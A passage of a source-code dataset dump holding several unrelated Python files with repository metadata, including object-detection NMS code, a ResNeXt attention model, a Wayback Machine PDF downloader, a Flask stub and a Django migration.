(xy[1] + xy[3]) / 2 / height,
(xy[2] - xy[0]) / width,
(xy[3] - xy[1]) / height]
def non_max_suppression(
prediction,
conf_thres=0.25,
iou_thres=0.45,
classes=None,
agnostic=False,
labels=()):
"""Performs Non-Maximum Suppression (NMS) on inference results
Returns:
detections with shape: nx6 (x1, y1, x2, y2, conf, cls)
"""
nc = prediction.shape[2] - 5 # number of classes
xc = prediction[..., 4] > conf_thres # candidates
# Settings
# (pixels) minimum and maximum box width and height
min_wh, max_wh = 2, 4096
max_det = 300 # maximum number of detections per image
max_nms = 30000 # maximum number of boxes into torchvision.ops.nms()
time_limit = 20.0 # seconds to quit after
redundant = True # require redundant detections
multi_label = nc > 1 # multiple labels per box (adds 0.5ms/img)
merge = False # use merge-NMS
t = time.time()
output = [torch.zeros((0, 6), device=prediction.device)
] * prediction.shape[0]
for xi, x in enumerate(prediction): # image index, image inference
# Apply constraints
# x[((x[..., 2:4] < min_wh) | (x[..., 2:4] > max_wh)).any(1), 4] = 0 #
# width-height
x = x[xc[xi]] # confidence
# Cat apriori labels if autolabelling
if labels and len(labels[xi]):
l = labels[xi]
v = torch.zeros((len(l), nc + 5), device=x.device)
v[:, :4] = l[:, 1:5] # box
v[:, 4] = 1.0 # conf
v[range(len(l)), l[:, 0].long() + 5] = 1.0 # cls
x = torch.cat((x, v), 0)
# If none remain process next image
if not x.shape[0]:
continue
# Compute conf
x[:, 5:] *= x[:, 4:5] # conf = obj_conf * cls_conf
# Box (center x, center y, width, height) to (x1, y1, x2, y2)
box = xywh2xyxy(x[:, :4])
# Detections matrix nx6 (xyxy, conf, cls)
if multi_label:
i, j = (x[:, 5:] > conf_thres).nonzero(as_tuple=False).T
x = torch.cat((box[i], x[i, j + 5, None], j[:, None].float()), 1)
else: # best class only
conf, j = x[:, 5:].max(1, keepdim=True)
x = torch.cat((box, conf, j.float()), 1)[conf.view(-1) > conf_thres]
# Filter by class
if classes is not None:
x = x[(x[:, 5:6] == torch.tensor(classes, device=x.device)).any(1)]
# Apply finite constraint
# if not torch.isfinite(x).all():
# x = x[torch.isfinite(x).all(1)]
# Check shape
n = x.shape[0] # number of boxes
if not n: # no boxes
continue
elif n > max_nms: # excess boxes
# sort by confidence
x = x[x[:, 4].argsort(descending=True)[:max_nms]]
# Batched NMS
c = x[:, 5:6] * (0 if agnostic else max_wh) # classes
boxes, scores = x[:, :4] + c, x[:, 4] # boxes (offset by class), scores
i = torchvision.ops.nms(boxes, scores, iou_thres) # NMS
if i.shape[0] > max_det: # limit detections
i = i[:max_det]
if merge and (
1 < n < 3E3): # Merge NMS (boxes merged using weighted mean)
# update boxes as boxes(i,4) = weights(i,n) * boxes(n,4)
iou = box_iou(boxes[i], boxes) > iou_thres # iou matrix
weights = iou * scores[None] # box weights
x[i, :4] = torch.mm(weights, x[:, :4]).float(
) / weights.sum(1, keepdim=True) # merged boxes
if redundant:
i = i[iou.sum(1) > 1] # require redundancy
output[xi] = x[i]
if (time.time() - t) > time_limit:
print(f'WARNING: NMS time limit {time_limit}s exceeded')
break # time limit exceeded
return output
| [
"me@hsheng.org"
] | me@hsheng.org |
3a6288fd90d84dfdf4c45f2ac3a254ddfdd9051e | 3865d338db6caedff9cce9c0ca2ac4b5929ac2d1 | /rosetta/filter_fragfold.py | 186863f6886335e1ced06a8a1fda526118c532ae | [] | no_license | vam-sin/bioinfo-toolbox | fc90b347da7d733a2e5732b7352f1e8cdbf5b164 | 79f52038b7eb20337508ee49a87d2677a8ffad9c | refs/heads/master | 2022-12-09T18:39:18.743490 | 2020-08-26T14:14:58 | 2020-08-26T14:14:58 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,458 | py | import sys
import parse_vall
import parse_cath_clf
from time import clock
def filter(cath_dom_list, frag_dict):
count = 0
for dom_id in cath_dom_list:
pdb_id = dom_id[:4]
if pdb_id in frag_dict:
count += 1
del frag_dict[pdb_id]
return frag_dict, count
def main(vallfile_name, clf_name, pdb_id):
pdb_sfam_dict = parse_cath_clf.get_pdb_sfam_dict(open(clf_name, 'r'))
sfam_dom_dict = parse_cath_clf.get_sfam_dom_dict(open(clf_name, 'r'))
sfam_list = pdb_sfam_dict[pdb_id]
dom_list = []
for sfam in sfam_list:
dom_list += sfam_dom_dict[sfam]
print dom_list
print 'Parsing started...'
t0 = clock()
vallfile_list = parse_vall.read(open(vallfile_name, 'r'))
t1 = clock()
print 'Parsing ended in %ds.\n' % (t1 - t0)
frag_dict = vallfile_list[2]
print 'Running filter...'
t0 = clock()
new_frag_dict, count = filter(dom_list, frag_dict)
t1 = clock()
print 'Filtered in %ds.\n' % (t1 - t0)
vallfile_list[2] = new_frag_dict
return vallfile_list, count
if __name__ == '__main__':
new_vallfile_list, count = main(sys.argv[1], sys.argv[2], sys.argv[3])
print 'Removed %d homologous proteins from vall file.' % count
print 'Writing started...'
t0 = clock()
parse_vall.write(new_vallfile_list, open('%s' % sys.argv[1], 'w'))
t1 = clock()
print 'Writing ended in %ds.\n' % (t1 - t0)
| [
"mirco.michel@scilifelab.se"
] | mirco.michel@scilifelab.se |
86157b173385f4d53dbc01fa8e2417b7ee496c95 | f952a4583b0b751a1d5e2c5c453b16b1eb790ce5 | /networks/resnext_50_share_attention.py | db6b84562b8195c8267425a8f726e74a486801de | [] | no_license | dotpyu/Concept-Sharing-Network | 18b636a556cbc2dff887ac3c06110c58064393c8 | 2c85b312ef7d93a79498b5b3a8bc7b4d008e7b94 | refs/heads/master | 2022-04-11T02:07:16.387275 | 2020-03-30T20:44:36 | 2020-03-30T20:44:36 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 15,668 | py |
import torch
import torch.nn as nn
from torch.autograd import Variable
from functools import reduce
import pdb
from collections import OrderedDict
import torch.nn.functional as f
class LambdaBase(nn.Sequential):
def __init__(self, fn, *args):
super(LambdaBase, self).__init__(*args)
self.lambda_func = fn
def forward_prepare(self, input):
output = []
for module in self._modules.values():
output.append(module(input))
return output if output else input
class Lambda(LambdaBase):
def forward(self, input):
return self.lambda_func(self.forward_prepare(input))
class LambdaMap(LambdaBase):
def forward(self, input):
return list(map(self.lambda_func,self.forward_prepare(input)))
class LambdaReduce(LambdaBase):
def forward(self, input):
return reduce(self.lambda_func,self.forward_prepare(input))
resnext_50_32x4d = nn.Sequential( # Sequential,
nn.Conv2d(3,64,(7, 7),(2, 2),(3, 3),1,1,bias=False),
nn.BatchNorm2d(64),
nn.ReLU(),
nn.MaxPool2d((3, 3),(2, 2),(1, 1)),
nn.Sequential( # Sequential,
nn.Sequential( # Sequential,
LambdaMap(lambda x: x, # ConcatTable,
nn.Sequential( # Sequential,
nn.Sequential( # Sequential,
nn.Conv2d(64,128,(1, 1),(1, 1),(0, 0),1,1,bias=False),
nn.BatchNorm2d(128),
nn.ReLU(),
nn.Conv2d(128,128,(3, 3),(1, 1),(1, 1),1,32,bias=False),
nn.BatchNorm2d(128),
nn.ReLU(),
),
nn.Conv2d(128,256,(1, 1),(1, 1),(0, 0),1,1,bias=False),
nn.BatchNorm2d(256),
),
nn.Sequential( # Sequential,
nn.Conv2d(64,256,(1, 1),(1, 1),(0, 0),1,1,bias=False),
nn.BatchNorm2d(256),
),
),
LambdaReduce(lambda x,y: x+y), # CAddTable,
nn.ReLU(),
),
nn.Sequential( # Sequential,
LambdaMap(lambda x: x, # ConcatTable,
nn.Sequential( # Sequential,
nn.Sequential( # Sequential,
nn.Conv2d(256,128,(1, 1),(1, 1),(0, 0),1,1,bias=False),
nn.BatchNorm2d(128),
nn.ReLU(),
nn.Conv2d(128,128,(3, 3),(1, 1),(1, 1),1,32,bias=False),
nn.BatchNorm2d(128),
nn.ReLU(),
),
nn.Conv2d(128,256,(1, 1),(1, 1),(0, 0),1,1,bias=False),
nn.BatchNorm2d(256),
),
Lambda(lambda x: x), # Identity,
),
LambdaReduce(lambda x,y: x+y), # CAddTable,
nn.ReLU(),
),
nn.Sequential( # Sequential,
LambdaMap(lambda x: x, # ConcatTable,
nn.Sequential( # Sequential,
nn.Sequential( # Sequential,
nn.Conv2d(256,128,(1, 1),(1, 1),(0, 0),1,1,bias=False),
nn.BatchNorm2d(128),
nn.ReLU(),
nn.Conv2d(128,128,(3, 3),(1, 1),(1, 1),1,32,bias=False),
nn.BatchNorm2d(128),
nn.ReLU(),
),
nn.Conv2d(128,256,(1, 1),(1, 1),(0, 0),1,1,bias=False),
nn.BatchNorm2d(256),
),
Lambda(lambda x: x), # Identity,
),
LambdaReduce(lambda x,y: x+y), # CAddTable,
nn.ReLU(),
),
),
nn.Sequential( # Sequential,
nn.Sequential( # Sequential,
LambdaMap(lambda x: x, # ConcatTable,
nn.Sequential( # Sequential,
nn.Sequential( # Sequential,
nn.Conv2d(256,256,(1, 1),(1, 1),(0, 0),1,1,bias=False),
nn.BatchNorm2d(256),
nn.ReLU(),
nn.Conv2d(256,256,(3, 3),(2, 2),(1, 1),1,32,bias=False),
nn.BatchNorm2d(256),
nn.ReLU(),
),
nn.Conv2d(256,512,(1, 1),(1, 1),(0, 0),1,1,bias=False),
nn.BatchNorm2d(512),
),
nn.Sequential( # Sequential,
nn.Conv2d(256,512,(1, 1),(2, 2),(0, 0),1,1,bias=False),
nn.BatchNorm2d(512),
),
),
LambdaReduce(lambda x,y: x+y), # CAddTable,
nn.ReLU(),
),
nn.Sequential( # Sequential,
LambdaMap(lambda x: x, # ConcatTable,
nn.Sequential( # Sequential,
nn.Sequential( # Sequential,
nn.Conv2d(512,256,(1, 1),(1, 1),(0, 0),1,1,bias=False),
nn.BatchNorm2d(256),
nn.ReLU(),
nn.Conv2d(256,256,(3, 3),(1, 1),(1, 1),1,32,bias=False),
nn.BatchNorm2d(256),
nn.ReLU(),
),
nn.Conv2d(256,512,(1, 1),(1, 1),(0, 0),1,1,bias=False),
nn.BatchNorm2d(512),
),
Lambda(lambda x: x), # Identity,
),
LambdaReduce(lambda x,y: x+y), # CAddTable,
nn.ReLU(),
),
nn.Sequential( # Sequential,
LambdaMap(lambda x: x, # ConcatTable,
nn.Sequential( # Sequential,
nn.Sequential( # Sequential,
nn.Conv2d(512,256,(1, 1),(1, 1),(0, 0),1,1,bias=False),
nn.BatchNorm2d(256),
nn.ReLU(),
nn.Conv2d(256,256,(3, 3),(1, 1),(1, 1),1,32,bias=False),
nn.BatchNorm2d(256),
nn.ReLU(),
),
nn.Conv2d(256,512,(1, 1),(1, 1),(0, 0),1,1,bias=False),
nn.BatchNorm2d(512),
),
Lambda(lambda x: x), # Identity,
),
LambdaReduce(lambda x,y: x+y), # CAddTable,
nn.ReLU(),
),
nn.Sequential( # Sequential,
LambdaMap(lambda x: x, # ConcatTable,
nn.Sequential( # Sequential,
nn.Sequential( # Sequential,
nn.Conv2d(512,256,(1, 1),(1, 1),(0, 0),1,1,bias=False),
nn.BatchNorm2d(256),
nn.ReLU(),
nn.Conv2d(256,256,(3, 3),(1, 1),(1, 1),1,32,bias=False),
nn.BatchNorm2d(256),
nn.ReLU(),
),
nn.Conv2d(256,512,(1, 1),(1, 1),(0, 0),1,1,bias=False),
nn.BatchNorm2d(512),
),
Lambda(lambda x: x), # Identity,
),
LambdaReduce(lambda x,y: x+y), # CAddTable,
nn.ReLU(),
),
),
nn.Sequential( # Sequential,
nn.Sequential( # Sequential,
LambdaMap(lambda x: x, # ConcatTable,
nn.Sequential( # Sequential,
nn.Sequential( # Sequential,
nn.Conv2d(512,512,(1, 1),(1, 1),(0, 0),1,1,bias=False),
nn.BatchNorm2d(512),
nn.ReLU(),
nn.Conv2d(512,512,(3, 3),(2, 2),(1, 1),1,32,bias=False),
nn.BatchNorm2d(512),
nn.ReLU(),
),
nn.Conv2d(512,1024,(1, 1),(1, 1),(0, 0),1,1,bias=False),
nn.BatchNorm2d(1024),
),
nn.Sequential( # Sequential,
nn.Conv2d(512,1024,(1, 1),(2, 2),(0, 0),1,1,bias=False),
nn.BatchNorm2d(1024),
),
),
LambdaReduce(lambda x,y: x+y), # CAddTable,
nn.ReLU(),
),
nn.Sequential( # Sequential,
LambdaMap(lambda x: x, # ConcatTable,
nn.Sequential( # Sequential,
nn.Sequential( # Sequential,
nn.Conv2d(1024,512,(1, 1),(1, 1),(0, 0),1,1,bias=False),
nn.BatchNorm2d(512),
nn.ReLU(),
nn.Conv2d(512,512,(3, 3),(1, 1),(1, 1),1,32,bias=False),
nn.BatchNorm2d(512),
nn.ReLU(),
),
nn.Conv2d(512,1024,(1, 1),(1, 1),(0, 0),1,1,bias=False),
nn.BatchNorm2d(1024),
),
Lambda(lambda x: x), # Identity,
),
LambdaReduce(lambda x,y: x+y), # CAddTable,
nn.ReLU(),
),
nn.Sequential( # Sequential,
LambdaMap(lambda x: x, # ConcatTable,
nn.Sequential( # Sequential,
nn.Sequential( # Sequential,
nn.Conv2d(1024,512,(1, 1),(1, 1),(0, 0),1,1,bias=False),
nn.BatchNorm2d(512),
nn.ReLU(),
nn.Conv2d(512,512,(3, 3),(1, 1),(1, 1),1,32,bias=False),
nn.BatchNorm2d(512),
nn.ReLU(),
),
nn.Conv2d(512,1024,(1, 1),(1, 1),(0, 0),1,1,bias=False),
nn.BatchNorm2d(1024),
),
Lambda(lambda x: x), # Identity,
),
LambdaReduce(lambda x,y: x+y), # CAddTable,
nn.ReLU(),
),
nn.Sequential( # Sequential,
LambdaMap(lambda x: x, # ConcatTable,
nn.Sequential( # Sequential,
nn.Sequential( # Sequential,
nn.Conv2d(1024,512,(1, 1),(1, 1),(0, 0),1,1,bias=False),
nn.BatchNorm2d(512),
nn.ReLU(),
nn.Conv2d(512,512,(3, 3),(1, 1),(1, 1),1,32,bias=False),
nn.BatchNorm2d(512),
nn.ReLU(),
),
nn.Conv2d(512,1024,(1, 1),(1, 1),(0, 0),1,1,bias=False),
nn.BatchNorm2d(1024),
),
Lambda(lambda x: x), # Identity,
),
LambdaReduce(lambda x,y: x+y), # CAddTable,
nn.ReLU(),
),
nn.Sequential( # Sequential,
LambdaMap(lambda x: x, # ConcatTable,
nn.Sequential( # Sequential,
nn.Sequential( # Sequential,
nn.Conv2d(1024,512,(1, 1),(1, 1),(0, 0),1,1,bias=False),
nn.BatchNorm2d(512),
nn.ReLU(),
nn.Conv2d(512,512,(3, 3),(1, 1),(1, 1),1,32,bias=False),
nn.BatchNorm2d(512),
nn.ReLU(),
),
nn.Conv2d(512,1024,(1, 1),(1, 1),(0, 0),1,1,bias=False),
nn.BatchNorm2d(1024),
),
Lambda(lambda x: x), # Identity,
),
LambdaReduce(lambda x,y: x+y), # CAddTable,
nn.ReLU(),
),
nn.Sequential( # Sequential,
LambdaMap(lambda x: x, # ConcatTable,
nn.Sequential( # Sequential,
nn.Sequential( # Sequential,
nn.Conv2d(1024,512,(1, 1),(1, 1),(0, 0),1,1,bias=False),
nn.BatchNorm2d(512),
nn.ReLU(),
nn.Conv2d(512,512,(3, 3),(1, 1),(1, 1),1,32,bias=False),
nn.BatchNorm2d(512),
nn.ReLU(),
),
nn.Conv2d(512,1024,(1, 1),(1, 1),(0, 0),1,1,bias=False),
nn.BatchNorm2d(1024),
),
Lambda(lambda x: x), # Identity,
),
LambdaReduce(lambda x,y: x+y), # CAddTable,
nn.ReLU(),
),
),
nn.Sequential( # Sequential,
nn.Sequential( # Sequential,
LambdaMap(lambda x: x, # ConcatTable,
nn.Sequential( # Sequential,
nn.Sequential( # Sequential,
nn.Conv2d(1024,1024,(1, 1),(1, 1),(0, 0),1,1,bias=False),
nn.BatchNorm2d(1024),
nn.ReLU(),
nn.Conv2d(1024,1024,(3, 3),(2, 2),(1, 1),1,32,bias=False),
nn.BatchNorm2d(1024),
nn.ReLU(),
),
nn.Conv2d(1024,2048,(1, 1),(1, 1),(0, 0),1,1,bias=False),
nn.BatchNorm2d(2048),
),
nn.Sequential( # Sequential,
nn.Conv2d(1024,2048,(1, 1),(2, 2),(0, 0),1,1,bias=False),
nn.BatchNorm2d(2048),
),
),
LambdaReduce(lambda x,y: x+y), # CAddTable,
nn.ReLU(),
),
nn.Sequential( # Sequential,
LambdaMap(lambda x: x, # ConcatTable,
nn.Sequential( # Sequential,
nn.Sequential( # Sequential,
nn.Conv2d(2048,1024,(1, 1),(1, 1),(0, 0),1,1,bias=False),
nn.BatchNorm2d(1024),
nn.ReLU(),
nn.Conv2d(1024,1024,(3, 3),(1, 1),(1, 1),1,32,bias=False),
nn.BatchNorm2d(1024),
nn.ReLU(),
),
nn.Conv2d(1024,2048,(1, 1),(1, 1),(0, 0),1,1,bias=False),
nn.BatchNorm2d(2048),
),
Lambda(lambda x: x), # Identity,
),
LambdaReduce(lambda x,y: x+y), # CAddTable,
nn.ReLU(),
),
nn.Sequential( # Sequential,
LambdaMap(lambda x: x, # ConcatTable,
nn.Sequential( # Sequential,
nn.Sequential( # Sequential,
nn.Conv2d(2048,1024,(1, 1),(1, 1),(0, 0),1,1,bias=False),
nn.BatchNorm2d(1024),
nn.ReLU(),
nn.Conv2d(1024,1024,(3, 3),(1, 1),(1, 1),1,32,bias=False),
nn.BatchNorm2d(1024),
nn.ReLU(),
),
nn.Conv2d(1024,2048,(1, 1),(1, 1),(0, 0),1,1,bias=False),
nn.BatchNorm2d(2048),
),
Lambda(lambda x: x), # Identity,
),
LambdaReduce(lambda x,y: x+y), # CAddTable,
nn.ReLU(),
),
),
# nn.AvgPool2d((7, 7),(1, 1)),
# Lambda(lambda x: x.view(x.size(0),-1)), # View,
)
class resnext_car_multitask(nn.Module):
def __init__(self, cropsize=224, resnext_model=None, class_num=1, test=False, fc_num = 8, att_num = 9):
super(resnext_car_multitask, self).__init__()
self.resnext_car_multitask=resnext_50_32x4d
self.classifier = []
self.att = []
self.att_k = []
self.class_num = class_num
self.relu = nn.ReLU()
self.drop = nn.Dropout(p=0.5)
self.upsample = nn.Upsample(scale_factor=2)
self.ave_pool = nn.AvgPool2d((7, 7),(1, 1))
self.ave_pool2 = nn.AvgPool2d((2,2),(1, 1))
self.att_num = att_num
self.fc_num = fc_num
self.max_pool = nn.MaxPool2d((7,7),(1,1))
embed_size = 66
embed_size = 2048
k = 5
self.soft = nn.Softmax(2)
# for params in self.parameters():
# params.requires_grad = False
self.cropsize = cropsize
for params in self.parameters():
if params.ndimension()>1:
torch.nn.init.xavier_uniform(params)
else:
torch.nn.init.normal(params)
for i in range(self.att_num):
self.att.append(nn.Conv2d(1024,1,(3, 3),(2, 2),(1, 1),1, 1,bias=False))
self.att_k.append(nn.Parameter(torch.zeros(1,1,k), requires_grad=True))
self.att[i].weight.data.fill_(0)
for i in range(self.class_num):
self.classifier.append(nn.Linear(embed_size,2))
self.classifier = nn.ModuleList(self.classifier)
self.att_k = nn.ParameterList(self.att_k)
self.att = nn.ModuleList(self.att)
if False:
print('loading model')
params = torch.load(resnext_model)
keys = params.keys()
# pop 1000 fc for loading models
keys1 = list(keys)
pdb.set_trace()
if test:
new_state_dict = OrderedDict()
for k,v in params.items():
word = k.split('.')
l = len(word[0])
name = k[l+1:]
new_state_dict[name] = v
self.resnext_car_multitask.load_state_dict(params)
else:
params.pop(keys1[-1])
params.pop(keys1[-2])
self.resnext_car_multitask.load_state_dict(params)
def forward(self, x,att_index, fc_index):
x = x.view(-1, 3, self.cropsize, self.cropsize)
# x = self.resnext_car_multitask(x)
module1 = nn.Sequential(*list(self.resnext_car_multitask.children())[:-1])
module2 = nn.Sequential(*list(self.resnext_car_multitask.children())[-1])
x1 =module1(x)
x =module2(x1)
x_norm = x1.view(x1.size(0),x1.size(1),-1)
x_norm = f.normalize(x_norm,p=2,dim=2)
x_norm = x_norm.view(x1.size(0),x1.size(1),x1.size(2),x1.size(3))
outputs = []
outputs2 = []
# x = self.upsample(x)
x = x.view(x.size(0), x.size(1), -1)
for i in range(self.class_num):
att0 = self.att[att_index[i]](x_norm)
height = att0.size(2)
att0 = att0.repeat(1,x.size(1),1,1)
att0 = att0.view(x.size(0),x.size(1),-1 )
att0_k = self.att_k[att_index[i]]
att0_k = att0_k.repeat(x.size(0),x.size(1),1)
att0 = torch.cat((att0, att0_k), 2)
att0 = self.soft(att0)
att0 = att0[:,:,0:(height*height)]
x0 = torch.sum(torch.mul(x,att0),2)
outputs.append(self.classifier[i](self.drop(x0)))
return outputs, outputs2
def resnext50_fg_car(pretrained=False, model_dir='', class_num=1, test=False, **kwargs):
if pretrained:
# model_dict = torch.load(model_dir)
model = resnext_car_multitask(resnext_model=model_dir, class_num=class_num, test=test, **kwargs)
params = torch.load(model_dir)
keys = params.keys()
keys1 = list(keys)
if not test:
print('load imagent model')
params.pop(keys1[-1])
params.pop(keys1[-2])
new_state_dict = OrderedDict()
for k,v in params.items():
name = 'resnext_car_multitask.'+k
new_state_dict[name] = v
state = model.state_dict()
state.update(new_state_dict)
model.load_state_dict(state)
else:
print('load test model')
new_state_dict = OrderedDict()
for k,v in params.items():
name = k[7:]
print(name)
new_state_dict[name] = v
state = model.state_dict()
state.update(new_state_dict)
model.load_state_dict(state)
else:
model = resnext_car_multitask(resnext_model=None, class_num=class_num, test=test, **kwargs)
return model
| [
"zhaoxiangyun915@gmail.com"
] | zhaoxiangyun915@gmail.com |
0904ea7fc406f810b0f0e92cd35e5f4c1d653eee | 2eec69f014b2111680904208e0a9bcb4f1c1e922 | /module/dropout_wrapper.py | d1e7a882eb2049a8e870f874e99ec7d9a57e57ec | [
"MIT"
] | permissive | UKPLab/mdl-stance-robustness | fc873d2ec95ee02866e03041123d8316bd677411 | a8ef3f498e7f238d5224debe9bfce478e480201f | refs/heads/master | 2023-07-19T21:51:14.086577 | 2022-05-17T12:55:18 | 2022-05-17T12:55:18 | 229,263,983 | 37 | 13 | MIT | 2023-07-06T21:36:14 | 2019-12-20T12:48:42 | Python | UTF-8 | Python | false | false | 1,102 | py | # Copyright (c) Microsoft. All rights reserved.
import torch
import torch.nn as nn
import torch.nn.functional as F
from torch.autograd import Variable
class DropoutWrapper(nn.Module):
"""
This is a dropout wrapper which supports the fix mask dropout
"""
def __init__(self, dropout_p=0, enable_vbp=True):
super(DropoutWrapper, self).__init__()
"""variational dropout means fix dropout mask
ref: https://discuss.pytorch.org/t/dropout-for-rnns/633/11
"""
self.enable_variational_dropout = enable_vbp
self.dropout_p = dropout_p
def forward(self, x):
"""
:param x: batch * len * input_size
"""
if self.training == False or self.dropout_p == 0:
return x
if len(x.size()) == 3:
mask = Variable(1.0 / (1-self.dropout_p) * torch.bernoulli((1-self.dropout_p) * (x.data.new(x.size(0), x.size(2)).zero_() + 1)), requires_grad=False)
return mask.unsqueeze(1).expand_as(x) * x
else:
return F.dropout(x, p=self.dropout_p, training=self.training)
| [
"schiller@ukp.informatik.tu-darmstadt.de"
] | schiller@ukp.informatik.tu-darmstadt.de |
194d93f9b8466fefd1d328db4121c16c65ee9dce | 94aa02baa8250861e457482ddcb6a214e57faaf1 | /waybackPDF.py | b4d75340f58b7d480b4f6fb0d7bc134b73e63ba0 | [] | no_license | atavacron/WaybackPDF | e7fff0784d10019269ec7df57e50c67b506147b2 | 8db212997c03b8f8c48d77558b9349e975c01ee7 | refs/heads/master | 2022-10-01T16:39:05.100250 | 2020-06-08T09:28:26 | 2020-06-08T09:28:26 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,996 | py | #!/usr/bin/env python3
# coding: utf-8
import json
import os
import re
import requests
import argparse
class PC:
"""PC (Print Color)
Used to generate some colorful, relevant, nicely formatted status messages.
"""
green = '\033[92m'
blue = '\033[94m'
orange = '\033[93m'
endc = '\033[0m'
ok_box = blue + '[*] ' + endc
note_box = green + '[+] ' + endc
warn_box = orange + '[!] ' + endc
def parse_arguments():
desc = ('OSINT tool to download archived PDF files from archive.org for'
' a given website.')
parser = argparse.ArgumentParser(description=desc)
parser.add_argument('-d', '--domain', type=str, action='store',
required=True,
help='The target domain you are looking for files')
parser.add_argument('-o', '--output', type=str, action='store',
required=False,
help='Optional output directory (Default is the domain name)')
parser.add_argument('--http', type=str, action='store',
required=False,
help='Use HTTP instead of HTTPS for the target domain.'
' The default behavior uses HTTPS')
args = parser.parse_args()
return args
def getPDFlist(domain, protocol):
print("\n" + PC.ok_box + "Requesting PDF list...")
# Default target is HTTPS
targetDomain = "https://{}".format(domain)
# Building URL
if protocol:
targetDomain = "http://{}".format(domain)
baseURL = "https://web.archive.org/web/timemap/"
payload = {'url':targetDomain, 'matchType':'prefix','collapse':'urlkey',
'output':'json', 'fl':'original,mimetype,timestamp,endtimestamp'
',groupcount,uniqcount', 'filter':'!statuscode:[45]..'
,'limit':'100000', '_':'1587473968806'}
# HTTP request to get PDF list
raw = requests.get(baseURL, params=payload).json()
# Building the PDF list
files = []
headers = raw[0]
for item in raw[1:]:
file = {}
for i, header in enumerate(headers):
file[headers[i]] = item[i]
files.append(file)
pdfs = []
for file in files:
if file['mimetype'] == 'application/pdf':
pdfs.append(file)
for pdf in pdfs:
# Create direct URL for each PDF
pdf['wayback'] = 'https://web.archive.org/web/' + pdf['timestamp'] + 'if_/' + pdf['original']
name = pdf['original'].rsplit('/',1)[1]
if ".pdf" in name:
name = name.rsplit(".", 1)
pdf['name'] = name[0] + '-' + pdf['timestamp'] + '.pdf'
print(PC.note_box + "{} PDFs found".format(len(pdfs)))
return pdfs
def downloadFiles(domain, pdfs, output):
# If needed, create directory
if not os.path.exists(output):
os.makedirs(output)
print("\n" + PC.ok_box + "Downloading Files...")
# Downloading and saving files
for p,pdf in enumerate(pdfs):
with open(output + '/' + pdf['name'],'wb') as file:
data = requests.get(pdf['wayback'])
file.write(data.content)
print(PC.note_box + "({}/{}) Saved {}".format(p+1, len(pdfs),pdf['name']))
def main():
"""Main Function"""
args = parse_arguments()
if args.output:
outputDir = args.output
else:
outputDir = args.domain
print("\n" + PC.note_box + "Web Archive PDF Downloader ")
print(PC.note_box + "Target domain : " + args.domain)
print(PC.note_box + "Output directory : {}/".format(outputDir))
#print(PC.note_box + "Output directory : {}/{}/".format(os.path.split(os.getcwd())[1],args.domain))
# Getting the PDF list
pdfList = getPDFlist(args.domain, args.http)
# Downloading PDF
downloadFiles(args.domain, pdfList, outputDir)
print("\n" + PC.ok_box + "Everything's done !")
print(PC.ok_box + "Happy analysis !\n")
if __name__ == "__main__":
main() | [
"haax@mdamail.ch"
] | haax@mdamail.ch |
518f828d05ed4b0ac679e36476365de455ed024e | 54fb337a7e86bdedd5a6ebad96efe451395d7226 | /main.py | a304cdd3e5d1d3258ac60f6c8a17881bd48baa1e | [] | no_license | jes67/flask-intro | d56e4544cfe7e953d147759cce4ec40869825e9c | 9d439e024d88db9c23c93d03ba3fa06ce34f8907 | refs/heads/master | 2021-08-18T04:29:33.704360 | 2020-03-12T18:46:36 | 2020-03-12T18:46:36 | 246,907,442 | 0 | 0 | null | 2021-03-20T03:02:41 | 2020-03-12T18:44:12 | HTML | UTF-8 | Python | false | false | 214 | py | from flask import Flask, render_template
from datetime import datetime
app = Flask(__name__)
@app.route("/about")
def about():
return render_template("about.html")
if __name__ == '__main__':
app.run()
| [
"jesusmlg16@gmail.com"
] | jesusmlg16@gmail.com |
0b27c96db7260b43fe3d2825059aa046f618a905 | 1dcb88c3fe76b372b1b74a1139720ab101ee26e3 | /queue.py | 8b6a114c91103f3682c4550e78a6cd43c637c764 | [
"Apache-2.0"
] | permissive | mitre/growthcleanr-web | e771cab7a74aadb196b7a9ef2a0f6333a7026acc | 1a495a11fb77605b5ef16c7e7d25644d39e59944 | refs/heads/main | 2023-08-23T03:15:27.383713 | 2021-07-09T22:31:20 | 2021-07-09T22:31:20 | 280,239,050 | 2 | 0 | Apache-2.0 | 2022-10-18T21:10:57 | 2020-07-16T19:20:41 | Jinja | UTF-8 | Python | false | false | 80 | py | from huey import SqliteHuey
huey_queue = SqliteHuey(filename="huey_queue.db")
| [
"dlchudnov@mitre.org"
] | dlchudnov@mitre.org |
80be48414788634625dc938448d454dd2db8ad4f | 45fef6ff83aaf11ca670e4eda965e455c3527a24 | /JSON-Pgm.py | d70368b0930857b5f7701064a7db07bdd317a896 | [] | no_license | Sowmya-1/Python-document | badb808c00fd8f3a8f92aa23376cd3cfc63776f4 | fca41bf471f5b82ed1f6a9c45a3957aa0e40e273 | refs/heads/master | 2021-01-11T15:42:41.311403 | 2017-02-22T08:01:56 | 2017-02-22T08:01:56 | 79,905,109 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 128 | py | import json
list=[1,2,3,4,5]
dic={'name':'sowmya','at':'asm','pack':['python','AJS','HTML']}
print json.dumps(dic,indent=4)
| [
"noreply@github.com"
] | noreply@github.com |
b76807ebb8bbbc27d5379ec7046e836931127ca8 | 56de20f6054038f8ea574962cf87ffb4db7d31ee | /api/migrations/0011_auto_20201231_0150.py | 71906673ad04da15d61417b00b46d9602c925f9b | [] | no_license | docker581/api_final_yatube | e5797cac4f3c1be7b79f8f6f9d4d14778a419fe4 | 2f7d29cc1630c8950be0cd654704cd2dc3844570 | refs/heads/master | 2023-05-30T16:19:15.323579 | 2021-06-23T23:51:11 | 2021-06-23T23:51:11 | 323,850,968 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 709 | py | # Generated by Django 3.1.4 on 2020-12-30 22:50
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('api', '0010_auto_20201230_2350'),
]
operations = [
migrations.RemoveConstraint(
model_name='follow',
name='unique_follow',
),
migrations.AlterField(
model_name='follow',
name='user',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='user', to=settings.AUTH_USER_MODEL),
),
]
| [
"denisd581@gmail.com"
] | denisd581@gmail.com |
